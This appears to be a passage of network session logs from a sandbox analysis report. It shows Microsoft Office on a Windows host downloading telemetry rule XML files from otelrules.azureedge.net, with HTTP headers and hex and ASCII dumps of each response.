                                                          2024-12-02 16:56:53 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          119192.168.2.44987713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:53 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:53 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:53 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1360
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                          ETag: "0x8DC582BDD74D2EC"
                                                          x-ms-request-id: a0e0d5c5-a01e-0084-68de-419ccd000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165653Z-174f7845968px8v7hC1EWR08ng0000001520000000001ns7
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:53 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          120192.168.2.44987813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:53 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:54 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:54 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1427
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                          ETag: "0x8DC582BE56F6873"
                                                          x-ms-request-id: c562a2d5-001e-0082-3a33-445880000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165654Z-174f7845968n2hr8hC1EWR9cag000000147000000000yfhd
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:54 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          121192.168.2.44987913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:54 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:55 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:55 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1390
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                          ETag: "0x8DC582BE3002601"
                                                          x-ms-request-id: e52eaca9-401e-0064-32a1-4254af000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165655Z-174f7845968xlwnmhC1EWR0sv800000014mg0000000062k3
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:55 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          122192.168.2.44988013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:55 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:55 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:55 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1401
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                          ETag: "0x8DC582BE2A9D541"
                                                          x-ms-request-id: cf0c8647-701e-003e-063e-4079b3000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165655Z-174f784596886s2bhC1EWR743w00000014qg00000000kn72
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:55 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          123192.168.2.44988113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:55 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:55 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:55 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1364
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                          ETag: "0x8DC582BEB6AD293"
                                                          x-ms-request-id: 20c5b054-901e-0016-7725-44efe9000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165655Z-174f78459685m244hC1EWRgp2c00000014n000000000460p
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:55 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          124192.168.2.44988213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:55 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:56 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:55 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1391
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                          ETag: "0x8DC582BDF58DC7E"
                                                          x-ms-request-id: df02ced2-c01e-0046-0352-442db9000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165655Z-174f7845968xlwnmhC1EWR0sv800000014dg00000000vq2t
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:56 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          125192.168.2.44988313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:56 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:56 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:56 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1354
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                          ETag: "0x8DC582BE0662D7C"
                                                          x-ms-request-id: bf56a963-f01e-0096-46b4-4310ef000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165656Z-174f7845968vqt9xhC1EWRgten00000014t000000000at9d
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:56 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          126192.168.2.44988413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:57 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:57 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:57 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1403
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                          ETag: "0x8DC582BDCDD6400"
                                                          x-ms-request-id: 709e6de4-501e-00a3-7b5b-43c0f2000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165657Z-174f784596886s2bhC1EWR743w00000014p000000000t1kb
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:57 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          127192.168.2.44988513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:57 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:57 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:57 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1366
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                          ETag: "0x8DC582BDF1E2608"
                                                          x-ms-request-id: eea98567-901e-007b-3159-44ac50000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165657Z-174f78459688l8rvhC1EWRtzr00000000h6000000000vmt1
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:57 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          128192.168.2.44988713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:57 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:58 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:58 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1362
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                          ETag: "0x8DC582BDF497570"
                                                          x-ms-request-id: 0ad7255b-c01e-00ad-65a2-42a2b9000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165658Z-174f7845968qj8jrhC1EWRh41s00000014rg000000005c8x
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:58 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          129192.168.2.44988813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:58 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:58 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:58 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1403
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                          ETag: "0x8DC582BDC2EEE03"
                                                          x-ms-request-id: a8b72aac-901e-005b-059f-432005000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165658Z-174f7845968psccphC1EWRuz9s00000014yg00000000efqy
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
